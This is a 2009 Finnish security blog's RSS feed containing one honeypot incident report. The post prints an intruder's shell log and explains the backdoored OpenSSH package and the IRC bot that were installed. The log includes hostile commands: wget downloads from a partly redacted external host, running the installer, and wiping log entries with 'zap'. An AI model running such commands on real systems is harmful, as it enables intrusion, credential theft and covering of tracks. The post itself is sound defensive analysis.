<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Tietoturvablogi &#187; openssh</title>
	<atom:link href="http://www.fitsec.com/blogi/tag/openssh/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.fitsec.com/blogi</link>
	<description>Suomalaista tietoturvaa</description>
	<lastBuildDate>Fri, 25 Sep 2009 20:26:19 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Tunkeilijat: Heikolla salasanalla suojatun SSH-yhteyden hyväksikäyttö</title>
		<link>http://www.fitsec.com/blogi/2009/04/05/tunkeilijat-heikolla-salasanalla-suojatun-ssh-yhteyden-hyvaksikaytto/</link>
		<comments>http://www.fitsec.com/blogi/2009/04/05/tunkeilijat-heikolla-salasanalla-suojatun-ssh-yhteyden-hyvaksikaytto/#comments</comments>
		<pubDate>Sun, 05 Apr 2009 19:42:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tunkeilijat]]></category>
		<category><![CDATA[hyväksikäyttö]]></category>
		<category><![CDATA[openssh]]></category>
		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://www.fitsec.com/blogi/?p=20</guid>
		<description><![CDATA[Sarjan aloittaa esimerkki SSH-yhteyden hyväksikäytöstä. Pystytimme Linux-palvelimen joka oli tarkoituksella asennettu siten, että järjestelmään pääsi suoraan kirjautumaan ylläpitäjän root-tunnuksilla SSH-yhteyden yli. Käyttäjätunnuksen salasana oli myös tarkoituksella asetettu sellaiseksi että se on murrettavissa kohtalaisella yrityksellä.
Jouduimme odottamaan hyökkääjän saapumista muutaman tunnin ajan järjestelmän aktivoimisesta. Alla hyökkääjän komentoloki, josta olemme piilottaneet ip- ja verkko-osoitteista osan tarkoituksella.
w
cat /etc/passwd
cat /proc/cpuinfo
ls
wget [...]]]></description>
			<content:encoded><![CDATA[<p>Sarjan aloittaa esimerkki SSH-yhteyden hyväksikäytöstä. Pystytimme Linux-palvelimen joka oli tarkoituksella asennettu siten, että järjestelmään pääsi suoraan kirjautumaan ylläpitäjän root-tunnuksilla SSH-yhteyden yli. Käyttäjätunnuksen salasana oli myös tarkoituksella asetettu sellaiseksi että se on murrettavissa kohtalaisella yrityksellä.<span id="more-20"></span></p>
<p>Jouduimme odottamaan hyökkääjän saapumista muutaman tunnin ajan järjestelmän aktivoimisesta. Alla hyökkääjän komentoloki, josta olemme piilottaneet ip- ja verkko-osoitteista osan tarkoituksella.</p>
<p style="padding-left: 30px;">w<br />
cat /etc/passwd<br />
cat /proc/cpuinfo<br />
ls<br />
wget &lt;poistettu&gt;.com/i[BS]sirsky/bkd<br />
tar xzvf bkd<br />
cd ./&#8211;/<br />
./inst<br />
ls<br />
mv zap /bin<br />
cd ..<br />
rm -rf bkd<br />
rm -rf ./&#8211;/<br />
ls<br />
w<br />
zap &lt;ip.ip.ip.ip&gt;.d<br />
w<br />
ls<br />
ls<br />
cat /etc/hosts<br />
w<br />
ls<br />
ls -a<br />
wget &lt;poistettu&gt;.com/sirsky/code.tgz<br />
tar xzvf code.jpg<br />
[U-ARROW][BS][BS][BS]tgz<br />
cd .n<br />
./start da[BS][BS]adware<br />
cd ..<br />
rm -rf code.tgz<br />
w</p>
<p>Muutamissa komennoissa olleista kirjoitusvirheistä päätellen hyökkääjänä on tällä kerralla ollut ihminen automaattisesti toimivan ohjelman sijaan. Huomionarvoista on myös &#8216;w&#8217;-komennon (&#8216;who&#8217;, näyttää järjestelmään sisäänkirjautuneena olevat käyttäjät) tiuha käyttäminen. Hyökkääjä olisi todennäköisesti lopettanut hyökkäyksen kesken jos olisi havainnut toisia käyttäjiä järjestelmässä.</p>
<p>Hyökkääjä on ensin tarkistanut järjestelmään rekisteröityjen käyttäjien listan /etc/passwd tiedostosta, jonka jälkeen hyökkääjä katsoi koneen prosessorin tiedot. Tämän jälkeen hyökkääjä latasi ulkopuolisesta verkkosoitteesta bkd-nimisen paketin, josta lisää alempana.</p>
<p>Paketin asentamisen jälkeen hyökkääjä poisti paketin lähdekoodit ja tämän lisäksi paketin mukana tulleella &#8216;zap&#8217;-ohjelmalla hyökkääjä poisti käyttöjärjestelmän lokeista kaikki tiedot joissa näkyi hänen käyttämänsä IP-osoite.</p>
<p>Seuraavaksi hyökkääjä tarkisti /etc/hosts-tiedoston ilmeisesti siltä varalta että hyväksikäytetty kone olisi sisäverkossa, jolloin hosts-tiedoston sisältö olisi mahdollisesti paljastanut muita hyväksikäytettäviä koneita sisäverkossa.</p>
<p>Tämän jälkeen hyökkääjä latasi samasta ulkopuolisesta verkko-osoitteesta code.tgz-nimisen paketin josta myös alempana lisää. Paketin asentamisen ja aktivoinnin jälkeen hyökkääjä poisti paketin lähdekoodit järjestelmästä. Tässä vaiheessa päätimme että olimme keränneet tarpeeksi dataa ja suljimme hyökkääjän käyttämän etäyhteyden ja irroitimme koneemme verkosta tutkimuksia varten.</p>
<p>Hyökkääjän ensimmäisenä lataama bkd-niminen paketti oli openSSH-ohjelmiston versio, jonne hyökkääjä oli ujuttanut omaa koodiaan mukaan. Hyökkääjä oli muokannut openSSH-ohjelmistoa siten, että se lähettää muiden käyttäjien sisäänkirjautuessa järjestelmään käyttäjien tunnus/salasana -parit sähköpostilla hyökkääjälle. Näitä tunnuksia käyttäen hyökkääjä voi yrittää murtautua myös muihin tietojärjestelmiin. Koodissa oleva takaovi myös takaa hyökkääjälle pääsyn järjestelmään vaikka tietojärjestelmän pääkäyttäjän salasana vaihdettaisiin.</p>
<p>Hyökkääjän toisena lataama paketti on muokattu kopio EnergyMech IRC-botista. Tämän avulla hyökkääjä voi helposti ajaa komentoja hyväksikäytetyssä järjestelmässä IRC-protokollan yli. IRC-botti oli asetettu liittymään tunnetussa julkisessa IRC-verkossa olevalle kanavalle. Kanavalla oli 12 muuta hyväksikäytettyä linux-palvelinta, joista on lähetetty asianosaisille abuse-viestit järjestelmien turvaamista varten.</p>
<p>Jäljitimme hyökkääjän Romaniassa sijaitsevaan kaupunkiin. Löysimme myös muuta dataa jolla hyökkääjä voidaan viranomaisten puolelta tunnistaa, ja nämä tiedot on lähetty Romanian viranomaisille tutkittavaksi. Valitettavasti hyökkääjän tunnistaminen ei kaikissa tapauksissa ole aina mahdollista.</p>
<p>Jatkamme Tunkeilijat-sarjaa tulevaisuudessa, ja pyrimme esittelemään ylläolevan kaltaisia tapauksia enemmänkin.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.fitsec.com/blogi/2009/04/05/tunkeilijat-heikolla-salasanalla-suojatun-ssh-yhteyden-hyvaksikaytto/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
